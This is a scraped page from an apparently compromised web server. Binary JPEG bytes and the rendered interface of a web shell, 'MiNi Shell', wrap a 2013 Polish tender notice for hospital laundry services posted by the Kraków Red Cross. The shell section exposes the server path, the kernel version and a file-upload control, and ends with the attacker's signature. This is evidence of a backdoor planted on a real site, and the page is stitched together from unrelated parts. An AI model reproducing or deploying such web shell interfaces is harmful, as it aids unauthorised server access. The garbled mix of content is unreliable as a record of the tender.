JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130125/36216-N-2013.html

<p class="kh_header"><b>Kraków: Usługa kompleksowego prania bielizny ogólnoszpitalnej NZOZ Zakładu Opiekuńczo-Leczniczego, 31-826 Kraków, os. Złotej Jesieni 1.</b><br>
<b>Numer ogłoszenia: 36216 - 2013; data zamieszczenia: 25.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Oddział Okręgowy Polskiego Czerwonego Krzyża , ul. Studencka 19, 31-116 Kraków, woj. małopolskie, tel. 12 422 91 15, faks 12 422 90 79.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pck.malopolska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: organizacja pożytku publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa kompleksowego prania bielizny ogólnoszpitalnej NZOZ Zakładu Opiekuńczo-Leczniczego, 31-826 Kraków, os. Złotej Jesieni 1..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa kompleksowego prania bielizny ogólnoszpitalnej NZOZ Zakładu Opiekuńczo-Leczniczego (dalej: ZOL). 2. Usługa obejmuje: - pranie wodne z jednoczesną dezynfekcją chemiczno-termiczną obejmujące pranie, maglowanie i fasonowanie bielizny pościelowej, piżam, szlafroków, koszul płóciennych, podkoszulków, odzieży roboczej (fartuchy i ubrania lekarskie), ręczników, ścierek, podkładów, firanek, zasłon, obrusów, mopów, worków itp.; - czyszczenie chemiczne (lub wodne przy zachowaniu odpowiednio dobranej technologii i środków piorąco-dezynfekcyjnych) koców; - dezynfekcję materacy, kołder i poduszek; - naprawę uszkodzonej bielizny; - transport bielizny szpitalnej od i do Zamawiającego; 3. Wykonawca zobowiązuje się : 1. do ponoszenia pełnej odpowiedzialności prawnej i materialnej za jakość wykonywanych usług pralniczych oraz zgodność procesu pralniczego z wymogami sanitarnymi, 2. do stosowania technologii właściwej do prania bielizny szpitalnej w celu uzyskania odpowiedniego efektu czystości, dezynfekcji, estetyki i trwałości bielizny (w zależności od rodzaju zanieczyszczeń), 3. do doboru odpowiedniej technologii prania z dezynfekcją, zapewniającej używanie środków piorąco-dezynfekujących o szerokim spektrum działania na bakterie - B wirusy - V, prątki gruźlicy- Tbc, F, 4. określenia dnia w tygodniu i godziny, w których Wykonawca będzie dostępny dla kontaktu z zamawiającym, 5. posiadania pozytywnej decyzji stacji sanitarno - epidemiologicznej, że pomieszczenia i urządzenia, w których odbywać się będzie pranie bielizny szpitalnej odpowiadają wszelkim wymogom sanitarno - epidemiologicznym, 6. stosowania środków piorących i dezynfekujących posiadających wymagane atesty i certyfikaty oraz technologię dezynfekcji niskotemperaturowej w procesie prania- temperatura nie większą niż 65o dla bielizny pościelowej, oraz 30o dla kocy wełnianych i poduszek - co pozwalana właściwą jakość prania nie powodując przyspieszonego zużycia bielizny. 7. stosowania środków w procesie prania i dezynfekcji zgodnych z przepisami ustawy z 13.09.2002 r. o produktach biobójczych (Dz. U. Nr 175 poz.1433 z poźn. zmian.) oraz Rozp. Ministra Zdrowia z dnia 17.01.2003r. w sprawie kategorii i grup produktów biobójczych wg ich przeznaczenia lub wpisanych do Rejestru Wyrobów Medycznych zgodnie z Ustawą z dnia 20 maja 2010r. o wyrobach medycznych (Dz. U. 2010 nr 107 poz. 679) , 8. wykonawca zapewni pakowanie w worki do transportu czystej bielizny szpitalnej posiadające atest PZH lub inny równoważny dokument, znakowania, transportowania (czyli dostarczenia do zamawiającego ) oraz rozliczania wagowo - ilościowo - asortymentowego bielizny. 4. Zamawiający zobowiązuje się do: 1. wydzielenia pomieszczenia dla składowania brudnej bielizny i czystej, 2. organizacji transportu brudnej i czystej bielizny na terenie ZOL, w celu składowania jej w wydzielonym pomieszczeniu, z którego będą zabierane przez wykonawcę w celu świadczenia usługi. 5. Wymagania szczegółowe 1. Wykonawca pobierać będzie od Zamawiającego rzeczy przeznaczone do prania, czyszczenia i naprawy, a także dostarczać będzie czystą bieliznę codziennie w dniach od poniedziałku do soboty. Przekazywanie brudnej bielizny tj. liczenie asortymentu odbywać się będzie w godzinach od 8.00 - 9.00, natomiast ważenie i przekazywanie czystej bielizny odbywać się będzie w godzinach od 11.00 - 12.00. 2. Poszczególne usługi będą realizowane przez Wykonawcę sukcesywnie z wyłączeniem niedziel i świąt w następujących terminach: 1) pranie pościeli, bielizny szpitalnej - w ciągu 24 godzin od chwili jej odbioru od Zamawiającego, 2) pranie odzieży roboczej - w ciągu 48 godzin od chwili jej odbioru od Zamawiającego, 3) naprawa (reperacja) pościeli, bielizny i odzieży roboczej - w ciągu 48 godzin od chwili jej odbioru od Zamawiającego, 4) czyszczenie chemiczne poduszek, koców, odzieży roboczej i wyrobów włókienniczych - w ciągu 48 godzin od chwili ich odbioru od Zamawiającego, 5) czyszczenie i pranie pokrowców, materacy, kołder - w ciągu 120 godzin od chwili ich pobrania od Zamawiającego. 6) dezynfekcja termiczna w komorze w ciągu 48 godzin. 3. Rzeczy przeznaczone do prania, czyszczenia i naprawy (reperacji) pobierane będą od Zamawiającego w odpowiednich workach foliowych dostarczonych przez Wykonawcę na jego koszt tj.: 1) zewnętrznych białych - rzeczy zanieczyszczone, 2) zewnętrznych czerwonych - rzeczy zakażone, 3) workach ochronnych - materace, poduszki, koce, pokrowce, Worki muszą być wiązane, o wymiarach 160 x80 cm. 4. Wykonawca dostarczać będzie czystą bieliznę w workach foliowych niebieskich i opakowaniach ochronnych (np. worki płócienne). 6. Sposób rozliczenia: Zamawiający będzie płacił wykonawcy za 1 kg upranej bielizny obejmującej czynności wymienione w pkt. III/2 SIWZ, wg załącznika (formularza cenowego) do umowy tzn.: przy odbiorze brudnej bielizny przez wykonawcę będzie tylko liczony asortyment ilościowy, natomiast bielizna na potrzeby rozliczenia będzie ważona po przywiezieniu czystej upranej od wykonawcy. 7. Warunki pozostałe: a. Szczegółowe warunki świadczenia usługi prania przez Wykonawcę na rzecz Zamawiającego określa projekt umowy (załącznik nr 5 do SIWZ) b. Nie dopuszcza się składania ofert częściowych. c. Zamawiający nie dopuszcza możliwości składania ofert wariantowych. d. Oferty nie zawierające pełnego przedmiotu zamówienia określonego w SIWZ zostaną odrzucone. Liczba kilogramów bielizny na 1 miesiąc - 1 600 kg;..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.20.00-3, 98.31.50.00-4, 98.39.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE WYMAGA WNIESIENIA WADIUM (stosownie do normy z art. 45 ust. 2 ustawy).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek posiadania wiedzy i doświadczenia będzie potwierdzony jeżeli wykonawca złoży oświadczenie o spełnianiu warunku udziału w postępowaniu oraz wykaże, że w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie usługi kompleksowego prania bielizny ogólnoszpitalnej, na kwotę nie mniejszą niż: 40 000,00 zł każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek znajdowania się w sytuacji ekonomicznej i finansowej będzie potwierdzony jeżeli wykonawca złoży oświadczenie o spełnianiu warunku udziału w postępowaniu oraz przedstawi opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 80 000,00 zł brutto (słownie: osiemdziesiąt tysięcy złotych 0/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Wykonawca w celu potwierdzenia, że oferowana przez niego usługa spełnia wymagania stawiane przez Zamawiającego wraz z ofertą składa:
a.	opinię sanitarną wydaną przez Państwową Stację Sanitarno-Epidemiologiczną potwierdzającą, że pralnia spełnia warunki określone w Rozporządzeniu Ministra Zdrowia z dnia 02.02.2011r. w sprawie wymagań jakim powinny odpowiadać pod w  względem   fachowym   i   sanitarnym   pomieszczenia   i   urządzenia  zakładu   opieki zdrowotnej (Dz. U. 2011r. Nr 31, poz. 158). 
b.	aktualne zaświadczenie Stacji Sanitarno-Epidemiologicznej, że pralnia podlega stałemu nadzorowi na zasadach określonych w ustawie o inspekcji sanitarnej i spełnia wymogi pozwalające na  pranie w niej bielizny zakładów opieki zdrowotnej  oraz  posiada zachowaną barierę higieniczną. - 
2.	Jeżeli informacje, wymagane z państwowej inspekcji sanitarnej, o których mowa pkt. 1 a i b, wynikają z protokołu kontroli albo innego dokumentu wystawionego przez Inspekcję Sanitarną, zamiast opinii lub zaświadczeń Wykonawca może załączyć protokół kontroli albo inny dokument, jeżeli stwierdza on aktualny stan faktyczny.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta ma zawierać :
a)	wypełniony formularz ofertowy (według załączonego wzoru - załącznik nr 1 do SIWZ),
b)	wypełniony formularz cenowy (według załączonego wzoru - załącznik nr 1A do formularza ofertowego),
c)	w przypadku  Wykonawców  działających  przez  pełnomocnika - pełnomocnictwo, o którym mowa w rozdziale XI pkt. 9b SIWZ,
d)	w przypadku Wykonawców wspólnie ubiegających się o zamówienie - dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kierując się zapisami art. 144 ust. 1 Ustawy dnia 29 stycznia 2004 r. Prawo zamówień publicznych Zamawiający dopuszcza dokonanie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących sytuacjach :
- w zakresie przedmiotowym (tj. m.in. rodzaj  asortymentu do prania, zmiana techniki, procesu prania), jeżeli wymaga tego zapewnienie prawidłowo wykonywanej usługi;
-	w zakresie zmiany terminów wykonywania usługi, jeżeli terminy ustalone w SIWZ nie będą adekwatne do sytuacji w jakiej znajdzie się użytkownik (np. zwiększona liczba pacjentów, niemożliwe do przewidzenia zdarzenia np. wystąpienie infekcji wymagającej zwiększonego prania) ;
-	w zakresie danych identyfikujących strony umowy, takich jak np. firma, adresu siedziby lub inne zapisy dotyczące wskazania stron;
-	w zakresie ceny brutto wynikłej ze zmiany stawki podatku od towarów i usług;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pck.malopolska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, ul. Studencka 19, 31-116 Kraków;Zamawiający nie przewiduje opłaty za SIWZ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2013 godzina 08:00, miejsce: Ofertę w formie pisemnej należy złożyć na Dzienniku Podawczym Małopolskiego Oddziału Okręgowego Polskiego Czerwonego Krzyża ul. Studencka 19, 31-116 Kraków, Dziennik Podawczy IIp. lub przesłać pocztą..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com